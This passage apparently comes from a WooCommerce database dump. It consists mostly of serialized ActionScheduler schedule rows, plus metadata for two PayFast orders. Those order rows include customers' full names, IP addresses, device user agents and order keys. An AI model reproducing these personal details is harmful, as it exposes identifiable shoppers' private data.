cheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17947,31979,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564516316;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17948,31980,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564516316;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17949,31981,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564522417;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17950,31982,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564522418;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17951,31983,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564530451;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17952,31984,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564530451;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17953,31985,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564538323;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17954,31986,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564538323;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17955,31987,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564546086;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17956,31988,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564546086;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17957,31989,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564551788;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17958,31990,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564551788;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17959,31991,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564559176;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17960,31992,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564559176;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17961,31994,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564562931;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17962,31995,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564562931;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17963,31996,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564568240;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17964,31997,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564568240;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17965,31998,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564571844;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17966,31999,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564571844;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17967,32000,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564575447;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17968,32001,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564575447;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17969,32002,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564579064;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17970,32003,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564579064;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17971,32004,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564582738;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17972,32005,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564582738;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17973,32006,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564586788;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17974,32007,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564586789;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17975,32008,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564592690;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17976,32009,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564592690;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17977,32010,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564599046;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17978,32011,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564599046;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17979,32012,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564603250;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17980,32013,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564603250;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17981,32014,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564613435;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17982,32015,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564613435;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17983,32016,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564617835;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17984,32017,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564617835;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17985,32018,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564624060;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17986,32019,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564624060;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17987,32020,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564627667;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17988,32021,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564627667;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17989,32022,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564631493;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17990,32023,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564631493;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17991,32024,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564636813;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17992,32025,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564636813;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17993,32026,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564640561;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17994,32027,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564640562;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17995,32028,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564647035;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17996,32029,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564647036;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17997,32030,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564652240;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17998,32031,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564652240;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17999,32032,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564657360;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18000,32033,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564657361;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18001,32035,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564654314;}'),(18002,32034,'_order_key','wc_order_QhpzgVLtsfdZz'),(18003,32034,'_customer_user','0'),(18004,32034,'_payment_method','payfast'),(18005,32034,'_payment_method_title','PayFast'),(18006,32034,'_customer_ip_address','41.13.136.49'),(18007,32034,'_customer_user_agent','Mozilla/5.0 (Linux; Android 7.0; VFD 1300 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Safari/537.36'),(18008,32034,'_created_via','checkout'),(18009,32034,'_cart_hash','b830c3fbcf4e2cccd5244d6db31e0573'),(18010,32034,'_billing_first_name','Foluke'),(18011,32034,'_billing_last_name','Brown Olorunlose'),(18012,32034,'_order_currency','ZAR'),(18013,32034,'_cart_discount','551'),(18014,32034,'_cart_discount_tax','0'),(18015,32034,'_order_shipping','0.00'),(18016,32034,'_order_shipping_tax','0'),(18017,32034,'_order_tax','0'),(18018,32034,'_order_total','199.00'),(18019,32034,'_order_version','3.6.5'),(18020,32034,'_prices_include_tax','no'),(18021,32034,'_billing_address_index','Foluke Brown Olorunlose         '),(18022,32034,'_shipping_address_index','        '),(18023,32034,'is_vat_exempt','no'),(18024,32036,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564654309;}'),(18025,32034,'_wcf_checkout_id','31362'),(18026,32034,'_wcf_flow_id','31300'),(18027,32034,'_wcf_bump_product',''),(18028,32034,'es_wc_activecampaign_opt_in','no'),(18029,32037,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564654720;}'),(18030,32034,'_date_completed','1564654715'),(18031,32034,'_date_paid','1564654715'),(18032,32034,'_paid_date','2019-08-01 12:18:35'),(18033,32034,'_completed_date','2019-08-01 12:18:35'),(18034,32038,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564654715;}'),(18035,32034,'_download_permissions_granted','yes'),(18036,32034,'_recorded_sales','yes'),(18037,32034,'_recorded_coupon_usage_counts','yes'),(18038,32034,'_order_stock_reduced','yes'),(18039,32034,'_bewpi_invoice_date','2019-08-01 12:18:35'),(18040,32034,'_bewpi_invoice_number','32034'),(18041,32034,'_bewpi_invoice_pdf_path','/32034-2019.pdf'),(18043,32040,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564665575;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18044,32041,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564665576;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18045,32042,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564670613;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18046,32043,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564670613;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18047,32044,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564674917;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18048,32045,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564674917;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18049,32046,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564672335;}'),(18050,32047,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564672385;}'),(18054,32048,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564672390;}'),(18056,32049,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564672386;}'),(18060,32050,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564672391;}'),(18066,32052,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564672391;}'),(18072,32054,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564672391;}'),(18078,32056,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564672391;}'),(18084,32058,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564672391;}'),(18090,32060,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564672391;}'),(18096,32062,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564672391;}'),(18098,32063,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564672386;}'),(18102,32064,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564672391;}'),(18107,32066,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564672391;}'),(18113,32068,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564672391;}'),(18119,32070,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564672391;}'),(18121,32072,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564674020;}'),(18122,32071,'_order_key','wc_order_STp3D1b0lUENu'),(18123,32071,'_customer_user','0'),(18124,32071,'_payment_method','payfast'),(18125,32071,'_payment_method_title','PayFast'),(18126,32071,'_customer_ip_address','105.4.3.33'),(18127,32071,'_customer_user_agent','Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A605F Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36'),(18128,32071,'_created_via','checkout'),(18129,32071,'_cart_hash','b830c3fbcf4e2cccd5244d6db31e0573'),(18130,32071,'_billing_first_name','Mpho'),(18131,32071,'_billing_last_name','Julie'),(18132,32071,'_order_currency','ZAR'),(18133,32071,'_cart_discount','551'),(18134,32071,'_cart_discount_tax','0'),(18135,32071,'_order_shipping','0.00'),(18136,32071,'_order_shipping_tax','0'),(18137,32071,'_order_tax','0'),(18138,32071,'_order_total','199.00'),(18139,32071,'_order_version','3.6.5'),(18140,32071,'_prices_include_tax','no'),(18141,32071,'_billing_address_index','Mpho Julie         '),(18142,32071,'_shipping_address_index','        '),(18143,32071,'is_vat_exempt','no'),(18144,32073,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564674015;}'),(18145,32071,'_wcf_checkout_id','31362'),(18146,32071,'_wcf_flow_id','31300'),(18147,32071,'_wcf_bump_product',''),(18148,32071,'es_wc_activecampaign_opt_in','no'),(18149,32074,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564674097;}'),(18150,32071,'_date_completed','1564674092'),(18151,32071,'_date_paid','1564674092'),(18152,32071,'_paid_date','2019-08-01 17:41:32'),(18153,32071,'_completed_date','2019-08-01 17:41:32'),(18154,32075,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564674092;}'),(18155,32071,'_download_permissions_granted','yes'),(18156,32071,'_recorded_sales','yes'),(18157,32071,'_recorded_coupon_usage_counts','yes'),(18158,32071,'_order_stock_reduced','yes'),(18159,32071,'_bewpi_invoice_date','2019-08-01 17:41:33'),(18160,32071,'_bewpi_invoice_number','32071'),(18161,32071,'_bewpi_invoice_pdf_path','/32071-2019.pdf'),(18162,32076,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564678555;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18163,32077,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564678555;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18164,32078,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564682286;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18165,32079,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564682286;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18166,32080,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564686151;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18167,32081,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564686151;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18168,32082,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564693045;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18169,32083,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564693045;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18170,32084,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564698641;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18171,32085,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564698641;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18172,32086,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564702974;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18173,32087,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564702974;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18174,32088,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564707913;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18175,32089,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564707913;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18176,32090,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564712684;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18177,32091,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564712684;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18178,32092,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564717415;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18179,32093,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564717415;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18180,32094,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564723116;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18181,32095,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564723116;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18182,32096,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564728113;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18183,32097,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564728113;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18184,32098,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564732991;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18185,32099,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564732991;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18186,32100,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0Actio